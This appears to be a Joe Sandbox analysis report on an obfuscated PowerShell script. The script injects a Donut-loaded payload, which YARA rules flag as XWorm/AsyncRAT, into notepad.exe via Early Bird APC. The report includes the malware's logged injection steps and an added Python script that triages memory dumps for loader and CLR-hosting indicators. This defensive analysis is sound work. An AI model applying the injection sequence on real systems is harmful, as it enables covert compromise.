                Preview:[+] Launching a sacrificial process. [*] Spoofed parent process: explorer.exe (PID: 4004). [*] Spawned process: .C:\Windows\System32\notepad.exe (PID: 3300)..[+] Injecting shellcode via Early Bird APC Queue. [*] Memory allocated. [-] Size: ..61440 bytes. [-] Address: ..0x000001D112FC0000. [-] Protection: .PAGE_READWRITE. [*] Payload decrypted and written. [-] Size: ..59648 bytes. [-] Address: ..0x000001D112FC0000. [*] Memory protection changed. [-] Protection: .PAGE_EXECUTE_READ. [*] APC queued. [-] Thread ID: ..6932. [*] Thread resumed. [*] Payload executed..[+] Closing opened handles. [*] Process Handle: .0x0000000000000964. [*] Thread Handle: ..0x000000000000097C.
                File type:ASCII text, with very long lines (65346), with CRLF line terminators
                Entropy (8bit):4.925742914506138
                TrID:
                  File name:py.ps1
                  File size:13'631'488 bytes
                  MD5:b570fa6c00d2478e939db9f5a3217afd
                  SHA1:246ea84aa4fabbf26048d8a5bf9e66918971c1a1
                  SHA256:de367800fbe772f10c52e4dff9a39de73ab08379c19f326680dc677eeba69bbc
                  SHA512:0e1a180e115bd88d08a14b4f013010f340f49b61efbe571f0df05eff04ec1339b718c01f94d7983224329ee472e4f9e27e86d992f60493c87d8f16154762656e
                  SSDEEP:49152:89givjXNuAV4p+ldPmADhRSDuTFTqUeBOZ5i3v:
                  TLSH:DCD6AE60BF945AF9EF8D1D3E905AAB1DC7F042172C32706BFA519F01B9DA146810B26F
                  File Content Preview:# Obfuscated using https://github.com/DARKNOSY/Rush-PowerShell-Obfuscator, made by DARKN0$Y....$decodedScript = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(@"..IyBPYmZ1c2NhdGVkIHVzaW5nIGh0dHBzOi8vZ2l0aHViLmNvbS9EQVJLTk9TWS9Sd
                  Icon Hash:3270d6baae77db44
                  No network behavior found

                  Target ID:0
                  Start time:23:26:04
                  Start date:21/04/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\py.ps1"
                  Imagebase:0x7ff6e3d50000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:2
                  Start time:23:26:05
                  Start date:21/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff66e660000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:7
                  Start time:23:26:40
                  Start date:21/04/2024
                  Path:C:\Windows\System32\notepad.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\notepad.exe
                  Imagebase:0x7ff6a0030000
                  File size:201'216 bytes
                  MD5 hash:27F71B12CB585541885A31BE22F61C83
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.3067644587.000001D114A90000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.3067774125.000001D114C51000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                  Reputation:moderate
                  Has exited:true

                    Execution Graph

                    Execution Coverage:15.4%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:27.1%
                    Total number of Nodes:48
                    Total number of Limit Nodes:7
(Execution graph rendered as a diagram on the original page; the node list is not reproduced. The executed paths in the injected code at 0x1d112fc9cab and 0x1d112fcab03 call LoadLibraryA, VirtualAlloc, VirtualProtect (repeatedly), CLRCreateInstance, SysAllocString and VirtualFree.)

                    Callgraph

(Call graph rendered as a diagram on the original page; the node list of function addresses is not reproduced.)

                    Control-flow Graph (interactive rendering omitted; the executed / not-executed colouring did not survive extraction)
                    Function 1d112fcab03 to 1d112fcaf1c. The entry block calls 1d112fcbd83 three times, then VirtualAlloc at 1d112fcab65; a loop from 1d112fcac3a to 1d112fcac80 calls LoadLibraryA at 1d112fcac67 on each iteration; the later blocks call 1d112fc9edb, 1d112fc9cab, 1d112fc9dc3, 1d112fcc05b, 1d112fcb35b, 1d112fca8bb, 1d112fcaf23, 1d112fca35b and 1d112fcb7e3, and the failure branches converge on 1d112fcaead before the exit block at 1d112fcaeef calls VirtualFree. Allocating a region, pulling in modules with LoadLibraryA in a loop and releasing a buffer on the way out is the shape of a reflective loader, and the hand-off to the function at 1d112fca8bb (API ID AllocCreateInstanceString) makes this the top-level stage of the injected code.
                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D112FC0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_1d112fc0000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID: Virtual$AllocFreeLibraryLoad
                    • String ID:
                    • API String ID: 2147011437-0
                    • Opcode ID: fe28ec89fccc7c30a97a41b99cb39f37780980cf65fc522e14c47b80859a8ba4
                    • Instruction ID: fc3378705cc53745efcabb586dd0aa259ef5c349483ccf38c60dd18a09dc15fe
                    • Opcode Fuzzy Hash: fe28ec89fccc7c30a97a41b99cb39f37780980cf65fc522e14c47b80859a8ba4
                    • Instruction Fuzzy Hash: 6AD19B70214A09ABE769EF39C4D6BFA73D1FB98301F14052ED58BC3186DA31F8568781
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph (interactive rendering omitted)
                    Function 1d112fcaf23 to 1d112fcb35a. No API calls. The body is a branchy sequence with one inner loop (1d112fcb27c to 1d112fcb2c7, re-entered from 1d112fcb2b4) and the failure branches converging on 1d112fcb33d. A loader routine with this shape and no imports is typically a pass over a table in the mapped image, such as relocations or the import directory; the graph alone does not say which.
                    Memory Dump Source
                    • Source File: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D112FC0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_1d112fc0000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7e9fd2fb88d1716d08f008b0402716a762c67916f2753a03cfe5ae87c672b0fa
                    • Instruction ID: 07f7739ebd9597051441f61cc60c1788aa37ae867f1dba64ca0d86ac27e93163
                    • Opcode Fuzzy Hash: 7e9fd2fb88d1716d08f008b0402716a762c67916f2753a03cfe5ae87c672b0fa
                    • Instruction Fuzzy Hash: 76E15C71508B488BDB59DF28C889AEAB7E1FF94310F14462EE84BC7255EF30E956CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D112FC0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_1d112fc0000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProtectVirtual$LibraryLoad
                    • String ID:
                    • API String ID: 895956442-0
                    • Opcode ID: 1e619bdf4bf7d8a1f72fe11a15149652bafd81afc1c25810297ea3c6b5571fd2
                    • Instruction ID: 953efa8875cdb303de78be08395d9bb5167408dcf2ce315203341b13c2afc715
                    • Opcode Fuzzy Hash: 1e619bdf4bf7d8a1f72fe11a15149652bafd81afc1c25810297ea3c6b5571fd2
                    • Instruction Fuzzy Hash: 0631C87130CA099FDB48AA6CD8867EA73D5EBD4710F04015AED8BC3289DE74DD4287D1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D112FC0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_1d112fc0000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProtectVirtual$LibraryLoad
                    • String ID:
                    • API String ID: 895956442-0
                    • Opcode ID: cb0b48a04ba6d100bcb83f194f8859affeb3638fd54d705697e528f09cea4154
                    • Instruction ID: 6f02e40f9392e3b23826b620b7b04cd68eab66462efe62cce28d33bc3a56b11a
                    • Opcode Fuzzy Hash: cb0b48a04ba6d100bcb83f194f8859affeb3638fd54d705697e528f09cea4154
                    • Instruction Fuzzy Hash: 4431C731308A099FDB58AA6C98967E973D1F7D4720F00025ADD4BD32C9DD74ED2187C6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph (interactive rendering omitted)
                    Function 1d112fca8bb to 1d112fcab02. Calls CLRCreateInstance at 1d112fca8fb and, after the blocks from 1d112fca910 to 1d112fca9ad, SysAllocString at 1d112fca9d6; two tight self-loops (1d112fcaa88 to 1d112fcaa9b and 1d112fcaac5 to 1d112fcaad9) follow before the single exit at 1d112fcaae7. CLRCreateInstance is the documented entry point for hosting the .NET runtime from native code and SysAllocString builds the BSTR arguments the hosting interfaces take, so this is the stage consistent with starting the CLR inside the injected notepad.exe and handing it the managed payload; the loader function at 1d112fcab03 calls it directly.
                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D112FC0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_1d112fc0000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocCreateInstanceString
                    • String ID:
                    • API String ID: 218245030-0
                    • Opcode ID: 5cd5b7eee56912e5f7479b10a49db03511dafd728bb5732e75b1c7ea787b1245
                    • Instruction ID: 17c423113d09393e17e715503c907d5ab3f0b00b38e3535bfb01b3e60b25790a
                    • Opcode Fuzzy Hash: 5cd5b7eee56912e5f7479b10a49db03511dafd728bb5732e75b1c7ea787b1245
                    • Instruction Fuzzy Hash: 99816D30208A09DFDB68EF38C889BE6B7E1FF95301F004A6ED59BC7151EA31E5498B41
                    Uniqueness

                    Uniqueness Score: -1.00%
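The two functions the report fingerprints by API ID, the loader at 1d112fcab03 (VirtualAlloc, LoadLibraryA, VirtualProtect, VirtualFree) and the CLR-hosting routine at 1d112fca8bb (CLRCreateInstance, SysAllocString), are what a responder wants to recognise in any dumped region, not just this one. As an added example, not Joe Sandbox code and not taken from the sample, the Python below performs the equivalent static triage on a region such as 000001D112FC0000: it checks whether a PE header survives (the report says "based on PE: false"), looks for the loader and CLR API names as NUL-terminated strings, the UTF-16 runtime version string, and the well-known CLR hosting GUIDs from metahost.h / mscoree.h. The input region is constructed for the demonstration; which of these strings and GUIDs this particular sample embeds is an assumption, not a fact from the report.

```python
"""Static triage of an executable memory region dumped from a sandboxed process.

Added example: not Joe Sandbox code and not part of the report. Flags the
indicators the report attributes to the injected code: loader APIs
(VirtualAlloc/LoadLibraryA/VirtualProtect/VirtualFree), CLR-hosting APIs
(CLRCreateInstance/SysAllocString), the CLR hosting GUIDs and the runtime
version string, plus whether a PE header survives in the region.
"""
import struct
import uuid

# API names the report attributes to the loader and CLR-hosting functions.
LOADER_APIS = ["VirtualAlloc", "VirtualProtect", "VirtualFree", "LoadLibraryA"]
CLR_APIS = ["CLRCreateInstance", "SysAllocString"]

# Well-known CLR hosting GUIDs from metahost.h / mscoree.h. In memory a GUID is
# stored in little-endian layout, which uuid.UUID.bytes_le reproduces.
CLR_GUIDS = {
    "CLSID_CLRMetaHost":    uuid.UUID("9280188D-0E8E-4867-B30C-7FA83884E8DE"),
    "IID_ICLRMetaHost":     uuid.UUID("D332DB9E-B9B3-4125-8207-A14884F53216"),
    "IID_ICLRRuntimeInfo":  uuid.UUID("BD39D1D2-BA2F-486A-89B0-B4B0CB466891"),
    "CLSID_CorRuntimeHost": uuid.UUID("CB2F6723-AB3A-11D2-9C40-00C04FA30A3E"),
    "IID_ICorRuntimeHost":  uuid.UUID("CB2F6722-AB3A-11D2-9C40-00C04FA30A3E"),
}
# Runtime version strings a CLR host passes to ICLRMetaHost::GetRuntime (UTF-16).
CLR_VERSIONS = ["v4.0.30319", "v2.0.50727"]


def has_pe_header(region: bytes) -> bool:
    """True if the region starts with an MZ header whose e_lfanew points at PE\\0\\0."""
    if len(region) < 0x40 or region[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", region, 0x3C)[0]
    return region[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def find_api_names(region: bytes, names) -> list:
    """Return the API names present as NUL-terminated ASCII strings, in list order."""
    return [n for n in names if n.encode("ascii") + b"\0" in region]


def find_clr_guids(region: bytes) -> list:
    """Return the names of CLR hosting GUIDs found in little-endian layout."""
    return sorted(name for name, g in CLR_GUIDS.items() if g.bytes_le in region)


def find_clr_versions(region: bytes) -> list:
    """Return runtime version strings found as UTF-16LE."""
    return [v for v in CLR_VERSIONS if v.encode("utf-16-le") in region]


def triage_region(region: bytes) -> dict:
    """Combine the indicators into a verdict a responder can act on."""
    loader = find_api_names(region, LOADER_APIS)
    clr_apis = find_api_names(region, CLR_APIS)
    guids = find_clr_guids(region)
    versions = find_clr_versions(region)
    hosts_clr = bool(clr_apis or guids or versions)
    if {"VirtualAlloc", "LoadLibraryA"} <= set(loader):
        verdict = "reflective loader" + (" hosting the CLR (.NET payload)" if hosts_clr else "")
    elif hosts_clr:
        verdict = "CLR host without loader APIs"
    else:
        verdict = "no loader or CLR indicators"
    return {
        "pe_header": has_pe_header(region),
        "loader_apis": loader,
        "clr_apis": clr_apis,
        "clr_guids": guids,
        "clr_versions": versions,
        "verdict": verdict,
    }


# Constructed sample region (not a dump from the report): headerless code bytes
# followed by the strings and GUIDs a CLR-hosting shellcode keeps in plaintext.
SAMPLE_REGION = (
    b"\x48\x83\xec\x28" + b"\x90" * 12                       # stand-in for code
    + b"VirtualAlloc\0LoadLibraryA\0VirtualProtect\0VirtualFree\0"
    + b"CLRCreateInstance\0SysAllocString\0"
    + "v4.0.30319".encode("utf-16-le") + b"\0\0"
    + CLR_GUIDS["CLSID_CLRMetaHost"].bytes_le
    + CLR_GUIDS["IID_ICLRMetaHost"].bytes_le
    + b"\0" * 16
)

if __name__ == "__main__":
    for key, value in triage_region(SAMPLE_REGION).items():
        print(f"{key:13} {value}")
```

The report's API IDs come from calls observed at runtime, so they survive even when a loader resolves imports by hash; this static check only fires when the names or GUIDs sit in plaintext in the dump, which is its main caveat. In practice run it over every executable region the sandbox dumped (the .sdmp files named under Memory Dump Source) and treat a CLR-hosting verdict in a process that never legitimately loads the runtime, such as notepad.exe, as a strong injection indicator.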

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D112FC0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_1d112fc0000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProtectVirtual$LibraryLoad
                    • String ID:
                    • API String ID: 895956442-0
                    • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                    • Instruction ID: 216b28c94a9541f120ff7c176920145de87635fd9d49647182a56004f2429079
                    • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                    • Instruction Fuzzy Hash: 44E0483120CA1E6FF758969DD88A7F666D8D796375F00106FE64AC2141E055D8A24391
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3068803621.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7ffd34980000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID: _
                    • API String ID: 0-701932520
                    • Opcode ID: 2ff20880ef1182d9df52cddda82add215d81d5c90008b41502847e4f6853a86a
                    • Instruction ID: ecb6c6b0c5f59b3199432ef04dbf89aa34895df7b7652f038bd95f2ac67daae7
                    • Opcode Fuzzy Hash: 2ff20880ef1182d9df52cddda82add215d81d5c90008b41502847e4f6853a86a
                    • Instruction Fuzzy Hash: 81610D22B0D6450FE7A4EBBCA4B61F977D5EF86324B0901BBD08DC7197DD68A8468381
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    Memory Dump Source
                    • Source File: 00000007.00000002.3068803621.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7ffd34980000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8281cf1039e0caf15cedac515c54a22b98ba24e28a2b54d7ff7133e19204f5d8
                    • Instruction ID: 59e8701e5abccb51d41c186040db1ffa84f450edbc312dec9ab918b380fe2b84
                    • Opcode Fuzzy Hash: 8281cf1039e0caf15cedac515c54a22b98ba24e28a2b54d7ff7133e19204f5d8
                    • Instruction Fuzzy Hash: 5991F530B0DB890FE79AEB7C84751693BA1EF86244B8641BED04ED71E3DD2D6C068751
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph (interactive rendering omitted)
                    Function 7ffd34980ca2 to 7ffd34980e8c. No API calls: one loop (7ffd34980d70 to 7ffd34980dab, re-entered from 7ffd34980da9) and otherwise straight-line code to the exit block at 7ffd34980e5a.
                    Memory Dump Source
                    • Source File: 00000007.00000002.3068803621.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7ffd34980000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f5c364016024997bcc7cf7f25636d160d0c816957aadae2bbb05145fec3b772d
                    • Instruction ID: 0006cabb0e3c82738f4002aadaf567d76664a737fbafc453881b146e08d00998
                    • Opcode Fuzzy Hash: f5c364016024997bcc7cf7f25636d160d0c816957aadae2bbb05145fec3b772d
                    • Instruction Fuzzy Hash: BB61F521B0DB850FE396A77C846A2797BD1EF87210B4A40FED489C71E7DC1DAC428362
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    Memory Dump Source
                    • Source File: 00000007.00000002.3068803621.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7ffd34980000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4814c77d81602a1d3b69b8a2be58bc4daade07812e6745245bd1f7617b12eb30
                    • Instruction ID: a684a8cf2a02985d9cf0f93ef0ca74a909cb39c6ae71dd93f6c2bb7cd4f44af9
                    • Opcode Fuzzy Hash: 4814c77d81602a1d3b69b8a2be58bc4daade07812e6745245bd1f7617b12eb30
                    • Instruction Fuzzy Hash: 9A41E62170DA890FE795E77C94692797BD6EF9A210B0901FFE04DC72A3CD589C468351
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    Memory Dump Source
                    • Source File: 00000007.00000002.3068803621.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7ffd34980000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 66c3f1782655448956dad1d9cf98989b01f16b6c2a81069204f28cb7ddcf80cb
                    • Instruction ID: 193f6f51db58f8b58515985e6e7d6bedf36d4152137c41c8062329ec8ea744bb
                    • Opcode Fuzzy Hash: 66c3f1782655448956dad1d9cf98989b01f16b6c2a81069204f28cb7ddcf80cb
                    • Instruction Fuzzy Hash: E651C434A09A498FE746EBBCC4756A97BB1FF4A304F9941B9D409E72E3DD396801C720
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph (interactive rendering omitted)
                    Function 7ffd349800c8. A single basic block from 7ffd349800c8 to 7ffd349809a4 (about 2.2 KB) with no branches and no API calls.
                    Memory Dump Source
                    • Source File: 00000007.00000002.3068803621.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7ffd34980000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 608fef857235c4063fe4c7742851995f5462e39e9cab3dba9f9047c1a558b088
                    • Instruction ID: 6c555eedf3b10b341c573038cf590ae2db6df6bde88c04681f3ef4608c2d7f43
                    • Opcode Fuzzy Hash: 608fef857235c4063fe4c7742851995f5462e39e9cab3dba9f9047c1a558b088
                    • Instruction Fuzzy Hash: 4131B521B1CA490FF798EB6C946A27976D6EFDA315F0501BEE04ED32E3DD689C418381
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph (interactive rendering omitted)
                    Function 7ffd34980b2d. Two blocks: 7ffd34980b2d to 7ffd34980c44 calls 7ffd34980190, then falls through to 7ffd34980c49 to 7ffd34980c59.
                    Memory Dump Source
                    • Source File: 00000007.00000002.3068803621.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7ffd34980000_notepad.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2999b7521abdf909fbed75f3e5b2e60dfc02d5cf263f04880cfb66fd989c12b5
                    • Instruction ID: 9a7ff8498b5f67e992eaba48b75670f1c93dbc9d9ede982899ec094ee439aceb
                    • Opcode Fuzzy Hash: 2999b7521abdf909fbed75f3e5b2e60dfc02d5cf263f04880cfb66fd989c12b5
                    • Instruction Fuzzy Hash: 5B318321B18A4A4FEB94B7BC486A3BD77E6EF99701F15017AE40DD32D3DE28A8418351
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D112FC0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_1d112fc0000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f79c8a23afe56d11b94332f0aa4a683b06ab6a29ecf11af3662490c09a5fc48f
                    • Instruction ID: 305cd06a2db4dbb70ebff887cf0b79b9468f25455ffe2602fbcdcf8a4a81a2d0
                    • Opcode Fuzzy Hash: f79c8a23afe56d11b94332f0aa4a683b06ab6a29ecf11af3662490c09a5fc48f
                    • Instruction Fuzzy Hash: 73F19774618A0EABDB68DF38C886BF5B3D1FB54311F14452ED99BC3291EB34E8129781
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D112FC0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_1d112fc0000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e8c66e5bdd5a090d70eb4ffc53b9627ae5a0aff87d1d0b46004e79355c561afd
                    • Instruction ID: 40ffc4e42711a71d8ffe9a6306de6574e0154c2ce86eab4f3207e8f513a20f4c
                    • Opcode Fuzzy Hash: e8c66e5bdd5a090d70eb4ffc53b9627ae5a0aff87d1d0b46004e79355c561afd
                    • Instruction Fuzzy Hash: 85A12D71608A0C8FDB55EF28C889BEA77E5FBA8315F10462FE84AC7160EB30D655CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.3066881739.000001D112FC0000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001D112FC0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_1d112fc0000_notepad.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c0fe8602adeed2f167eb202e12a10f3e3af28f60814960b5ae7f64c00d27349f
                    • Instruction ID: 41a0e9fe3f1e6a4751b8df877f28eb47a438aee33fefe8e3ddc1bbee64d63d8d
                    • Opcode Fuzzy Hash: c0fe8602adeed2f167eb202e12a10f3e3af28f60814960b5ae7f64c00d27349f
                    • Instruction Fuzzy Hash: 8B815771618B499BEB68DF34C88ABEAB7D4FB58301F00462E959BC3241EF34E5558BC1
                    Uniqueness

                    Uniqueness Score: -1.00%